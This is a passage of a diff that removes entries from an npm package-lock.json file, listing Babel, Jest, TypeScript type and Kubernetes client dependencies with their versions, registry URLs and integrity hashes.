"https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-typescript": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.22.5.tgz", - "integrity": "sha512-1mS2o03i7t1c6VzH6fdQ3OA8tcEIxwG18zIPRp+UY1Ihv6W+XZzBCVxExF9upussPXJ0xE9XRHwMoNs1ep/nRQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.22.5" - } - }, - "@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" - } - }, - "@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - } - }, - "@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, - "requires": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - } - }, - "@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "requires": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "dependencies": { - "argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "requires": { - "sprintf-js": "~1.0.2" - } - }, - "js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "requires": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - } - }, - "sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - } - } - }, - "@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true - }, - "@jest/console": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.6.1.tgz", - "integrity": "sha512-Aj772AYgwTSr5w8qnyoJ0eDYvN6bMsH3ORH1ivMotrInHLKdUz6BDlaEXHdM6kODaBIkNIyQGzsMvRdOv7VG7Q==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0" - } - }, - "@jest/core": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.6.1.tgz", - "integrity": "sha512-CcowHypRSm5oYQ1obz1wfvkjZZ2qoQlrKKvlfPwh5jUXVU12TWr2qMeH8chLMuTFzHh5a1g2yaqlqDICbr+ukQ==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/reporters": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.5.0", - "jest-config": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-resolve-dependencies": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "jest-watcher": "^29.6.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - } - }, - "@jest/environment": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.6.1.tgz", - "integrity": "sha512-RMMXx4ws+Gbvw3DfLSuo2cfQlK7IwGbpuEWXCqyYDcqYTI+9Ju3a5hDnXaxjNsa6uKh9PQF2v+qg+RLe63tz5A==", - "dev": true, - "requires": { - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1" - } - }, - "@jest/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-N5xlPrAYaRNyFgVf2s9Uyyvr795jnB6rObuPx4QFvNJz8aAjpZUDfO4bh5G/xuplMID8PrnuF1+SfSyDxhsgYg==", - "dev": true, - "requires": { - "expect": "^29.6.1", - "jest-snapshot": "^29.6.1" - } - }, - "@jest/expect-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.6.1.tgz", - "integrity": "sha512-o319vIf5pEMx0LmzSxxkYYxo4wrRLKHq9dP1yJU7FoPTB0LfAKSz8SWD6D/6U3v/O52t9cF5t+MeJiRsfk7zMw==", - "dev": true, - "requires": { - "jest-get-type": "^29.4.3" - } - }, - "@jest/fake-timers": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.6.1.tgz", - "integrity": "sha512-RdgHgbXyosCDMVYmj7lLpUwXA4c69vcNzhrt69dJJdf8azUrpRh3ckFCaTPNjsEeRi27Cig0oKDGxy5j7hOgHg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "@jest/globals": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.6.1.tgz", - "integrity": "sha512-2VjpaGy78JY9n9370H8zGRCFbYVWwjY6RdDMhoJHa1sYfwe6XM/azGN0SjY8kk7BOZApIejQ1BFPyH7FPG0w3A==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/types": "^29.6.1", - "jest-mock": "^29.6.1" - } - }, - "@jest/reporters": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.6.1.tgz", - "integrity": "sha512-9zuaI9QKr9JnoZtFQlw4GREQbxgmNYXU6QuWtmuODvk5nvPUeBYapVR/VYMyi2WSx3jXTLJTJji8rN6+Cm4+FA==", - "dev": true, - "requires": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - } - }, - "@jest/schemas": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.0.tgz", - "integrity": "sha512-rxLjXyJBTL4LQeJW3aKo0M/+GkCOXsO+8i9Iu7eDb6KwtP65ayoDsitrdPBtujxQ88k4wI2FNYfa6TOGwSn6cQ==", - "dev": true, - "requires": { - "@sinclair/typebox": "^0.27.8" - } - }, - "@jest/source-map": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.0.tgz", - "integrity": "sha512-oA+I2SHHQGxDCZpbrsCQSoMLb3Bz547JnM+jUr9qEbuw0vQlWZfpPS7CO9J7XiwKicEz9OFn/IYoLkkiUD7bzA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.6.1.tgz", - "integrity": "sha512-Ynr13ZRcpX6INak0TPUukU8GWRfm/vAytE3JbJNGAvINySWYdfE7dGZMbk36oVuK4CigpbhMn8eg1dixZ7ZJOw==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/test-sequencer": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.6.1.tgz", - "integrity": "sha512-oBkC36PCDf/wb6dWeQIhaviU0l5u6VCsXa119yqdUosYAt7/FbQU2M2UoziO3igj/HBDEgp57ONQ3fm0v9uyyg==", - "dev": true, - "requires": { - "@jest/test-result": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "slash": "^3.0.0" - } - }, - "@jest/transform": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.6.1.tgz", - "integrity": "sha512-URnTneIU3ZjRSaf906cvf6Hpox3hIeJXRnz3VDSw5/X93gR8ycdfSIEy19FlVx8NFmpN7fe3Gb1xF+NjXaQLWg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - } - }, - "@jest/types": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.1.tgz", - "integrity": "sha512-tPKQNMPuXgvdOn2/Lg9HNfUvjYVGolt04Hp03f5hAk878uwOLikN+JzeLY0HcVgKgFl9Hs3EIqpu3WX27XNhnw==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true - }, - "@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true - }, - "@jridgewell/sourcemap-codec": { - "version": "1.4.15", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", - "dev": true - }, - "@jridgewell/trace-mapping": { - "version": "0.3.18", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.18.tgz", - "integrity": "sha512-w+niJYzMHdd7USdiH2U6869nqhD2nbfZXND5Yp93qIbEmnDNk7PD48o+YchRVpzMU7M6jVCbenTR7PA1FLQ9pA==", - "dev": true, - "requires": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - }, - "dependencies": { - "@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - } - } - }, - "@kubernetes/client-node": { - "version": "0.19.0", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.19.0.tgz", - "integrity": "sha512-WTOjGuFQ8yeW3+qD6JrAYhpwpoQbe9R8cA/61WCyFrNawSTUgLstHu7EsZRYEs39er3jDn3wCEaczz+VOFlc2Q==", - "requires": { - "@types/js-yaml": "^4.0.1", - "@types/node": "^20.1.1", - "@types/request": "^2.47.1", - "@types/ws": "^8.5.3", - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^7.2.0", - "openid-client": "^5.3.0", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^6.1.11", - "tslib": "^2.4.1", - "ws": "^8.11.0" - }, - "dependencies": { - "@types/node": { - "version": "20.8.10", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.8.10.tgz", - "integrity": "sha512-TlgT8JntpcbmKUFzjhsyhGfP2fsiz1Mv56im6enJ905xG1DAYesxJaeSbGqQmAw8OWPdhyJGhGSQGKRNJ45u9w==", - "requires": { - "undici-types": "~5.26.4" - } - } - } - }, - "@nicolo-ribaudo/semver-v6": { - "version": "6.3.3", - "resolved": "https://registry.npmjs.org/@nicolo-ribaudo/semver-v6/-/semver-v6-6.3.3.tgz", - "integrity": "sha512-3Yc1fUTs69MG/uZbJlLSI3JISMn2UV2rg+1D/vROUqZyh3l6iYHCs7GMp+M40ZD7yOdDbYjJcU1oTJhrc+dGKg==", - "dev": true - }, - "@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "@sinonjs/commons": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.0.tgz", - "integrity": "sha512-jXBtWAF4vmdNmZgD5FoKsVLv3rPgDnLgPbU84LIJ3otV44vJlDRokVng5v8NFJdCf/da9legHcKaRuZs4L7faA==", - "dev": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "requires": { - "@sinonjs/commons": "^3.0.0" - } - }, - "@types/babel__core": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.1.tgz", - "integrity": "sha512-aACu/U/omhdk15O4Nfb+fHgH/z3QsfQzpnvRZhYhThms83ZnAOZz7zZAWO7mn2yyNQaA4xTO8GLK3uqFU4bYYw==", - "dev": true, - "requires": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "requires": { - "@babel/types": "^7.0.0" - } - }, - "@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "@types/babel__traverse": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.1.tgz", - "integrity": "sha512-MitHFXnhtgwsGZWtT68URpOvLN4EREih1u3QtQiN4VdAxWKRVvGCSvw/Qth0M0Qq3pJpnGOu5JaM/ydK7OGbqg==", - "dev": true, - "requires": { - "@babel/types": "^7.20.7" - } - }, - "@types/caseless": { - "version": "0.12.2", - "resolved": "https://registry.npmjs.org/@types/caseless/-/caseless-0.12.2.tgz", - "integrity": "sha512-6ckxMjBBD8URvjB6J3NcnuAn5Pkl7t3TizAg+xdlzzQGSPSmBcXf8KoIH0ua/i+tio+ZRUHEXp0HEmvaR4kt0w==" - }, - "@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/ip-address": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/@types/ip-address/-/ip-address-7.0.0.tgz", - "integrity": "sha512-OyDm4EwZsYPDUjXz3ktiuQE8PJIPO1uUZMfvZMcWmykWjm3WVyI78rAnHkqKV3pMR7iDRKfalI+RxG5JBDUo5w==", - "dev": true, - "requires": { - "ip-address": "*" - } - }, - "@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "requires": { - "@types/istanbul-lib-coverage": "*" - } - }, - "@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "requires": { - "@types/istanbul-lib-report": "*" - } - }, - "@types/jest": { - "version": "29.5.3", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.3.tgz", - "integrity": "sha512-1Nq7YrO/vJE/FYnqYyw0FS8LdrjExSgIiHyKg7xPpn+yi8Q4huZryKnkJatN1ZRH89Kw2v33/8ZMB7DuZeSLlA==", - "dev": true, - "requires": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "@types/js-yaml": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.5.tgz", - "integrity": "sha512-FhpRzf927MNQdRZP0J5DLIdTXhjLYzeUTmLAu69mnVksLH9CJY3IuSeEgbKUki7GQZm0WqDkGzyxju2EZGD2wA==" - }, - "@types/lodash": { - "version": "4.14.195", - "resolved": "https://registry.npmjs.org/@types/lodash/-/lodash-4.14.195.tgz", - "integrity": "sha512-Hwx9EUgdwf2GLarOjQp5ZH8ZmblzcbTBC2wtQWNKARBSxM9ezRIAUpeDTgoQRAFB0+8CNWXVA9+MaSOzOF3nPg==", - "dev": true - }, - "@types/mustache": { - "version": "4.2.6", - "resolved": "https://registry.npmjs.org/@types/mustache/-/mustache-4.2.6.tgz", - "integrity": "sha512-t+8/QWTAhOFlrF1IVZqKnMRJi84EgkIK5Kh0p2JV4OLywUvCwJPFxbJAl7XAow7DVIHsF+xW9f1MVzg0L6Szjw==", - "dev": true - }, - "@types/node": { - "version": "16.18.38", - "resolved": "https://registry.npmjs.org/@types/node/-/node-16.18.38.tgz", - "integrity": "sha512-6sfo1qTulpVbkxECP+AVrHV9OoJqhzCsfTNp5NIG+enM4HyM3HvZCO798WShIXBN0+QtDIcutJCjsVYnQP5rIQ==" - }, - "@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true - }, - "@types/request": { - "version": "2.48.8", - "resolved": "https://registry.npmjs.org/@types/request/-/request-2.48.8.tgz", - "integrity": "sha512-whjk1EDJPcAR2kYHRbFl/lKeeKYTi05A15K9bnLInCVroNDCtXce57xKdI0/rQaA3K+6q0eFyUBPmqfSndUZdQ==", - "requires": { - "@types/caseless": "*", - "@types/node": "*", - "@types/tough-cookie": "*", - "form-data": "^2.5.0" - } - }, - "@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "@types/tough-cookie": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.2.tgz", - "integrity": "sha512-Q5vtl1W5ue16D+nIaW8JWebSSraJVlK+EthKn7e7UcD4KWsaSJ8BqGPXNaPghgtcn/fhvrN17Tv8ksUsQpiplw==" - }, - "@types/ws": { - "version": "8.5.5", - "resolved": "https://registry.npmjs.org/@types/ws/-/ws-8.5.5.tgz", - "integrity": "sha512-lwhs8hktwxSjf9UaZ9tG5M03PGogvFaH8gUgLNbN9HKIg0dvv6q+gkSuJ8HN4/VbyxkuLzCjlN7GquQ0gUJfIg==", - "requires": { - "@types/node": "*" - } - }, - "@types/yargs": { - "version": "17.0.24", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", - "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", - "dev": true, - "requires": { - "@types/yargs-parser": "*" - } - }, - "@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "requires": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - } - }, - "ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "requires": { - "type-fest": "^0.21.3" - } - }, - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": 